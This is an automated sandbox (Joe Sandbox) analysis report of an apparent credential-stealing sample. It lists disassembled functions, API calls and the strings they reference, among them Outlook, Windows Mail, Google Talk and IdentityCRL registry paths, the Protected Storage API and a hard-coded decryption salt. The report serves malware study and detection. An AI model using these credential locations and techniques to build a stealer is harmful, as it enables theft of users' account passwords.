                                        • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                        • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                        • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                        • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                        • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                        • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                        • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                        Strings
                                        • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                        • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                        • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                        • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                        • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                        • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                        • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                        • pstorec.dll, xrefs: 00403C30
                                        • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                        • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                        • PStoreCreateInstance, xrefs: 00403C44
                                        • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc_mbscpy
                                        • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                        • API String ID: 1197458902-317895162
                                        • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                        • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                        • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                        • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                        • String ID: h4ND$kGu
                                        • API String ID: 3662548030-565523899
                                        • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                        • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                        • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                        • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                        • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                        • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                        • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                          • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                          • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                          • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                          • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                        • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                        • API String ID: 2768085393-1693574875
                                        • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                        • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                        • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                        • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 0044430B
                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                          • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                          • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                          • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                          • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                          • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                        • memset.MSVCRT ref: 00444379
                                        • memset.MSVCRT ref: 00444394
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                        • strlen.MSVCRT ref: 004443DB
                                        • _strcmpi.MSVCRT ref: 00444401
                                        Strings
                                        • Store Root, xrefs: 004443A5
                                        • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                        • \Microsoft\Windows Mail, xrefs: 00444329
                                        • \Microsoft\Windows Live Mail, xrefs: 00444350
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                        • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                        • API String ID: 832325562-2578778931
                                        • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                        • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                        • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                        • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                        APIs
                                        • memset.MSVCRT ref: 0040F567
                                        • memset.MSVCRT ref: 0040F57F
                                          • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                        • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                        • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                        • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                        • String ID:
                                        • API String ID: 2012582556-3916222277
                                        • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                        • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                        • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                        • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                        APIs
                                        • memset.MSVCRT ref: 004037EB
                                        • memset.MSVCRT ref: 004037FF
                                          • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                          • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                          • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                          • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                        • strchr.MSVCRT ref: 0040386E
                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                        • strlen.MSVCRT ref: 00403897
                                        • sprintf.MSVCRT ref: 004038B7
                                        • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                        • String ID: %s@yahoo.com
                                        • API String ID: 317221925-3288273942
                                        • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                        • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                        • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                        • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                        APIs
                                        • memset.MSVCRT ref: 00403504
                                        • memset.MSVCRT ref: 0040351A
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                        • _mbscat.MSVCRT ref: 0040356D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscatmemset$Close_mbscpystrlen
                                        • String ID: InstallPath$Software\Group Mail$fb.dat
                                        • API String ID: 3071782539-966475738
                                        • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                        • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                        • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                        • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                        • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                        • DeleteObject.GDI32(?), ref: 0040CD5A
                                        • memset.MSVCRT ref: 0040CD96
                                        • LoadIconA.USER32(00000065), ref: 0040CDA6
                                        • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                        • String ID:
                                        • API String ID: 2054149589-0
                                        • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                        • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                        • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                        • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                        APIs
                                        • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                          • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                          • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                        • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                          • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                          • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                          • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                          • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                          • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                          • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                        • memset.MSVCRT ref: 00408620
                                          • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                        • memset.MSVCRT ref: 00408671
                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                        • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                        Strings
                                        • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                        • String ID: Software\Google\Google Talk\Accounts
                                        • API String ID: 1366857005-1079885057
                                        • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                        • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                        • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                        • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                         Control-flow Graph (rendered graph; legend: Executed / Not Executed; block and edge list follows)
                                         control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 430 40baa0-40bab3 call 407e30 438 40bab5-40bac1 430->438 439 40bafa-40bb09 SetCursor 430->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->430 446->430 447->430 448->430 449->430
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Cursor_mbsicmpqsort
                                        • String ID: /nosort$/sort
                                        • API String ID: 882979914-1578091866
                                        • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                        • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                        • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                        • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                          • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                          • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                          • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                          • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProcProtectVirtual
                                        • String ID:
                                        • API String ID: 2099061454-0
                                        • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                        • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                        • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
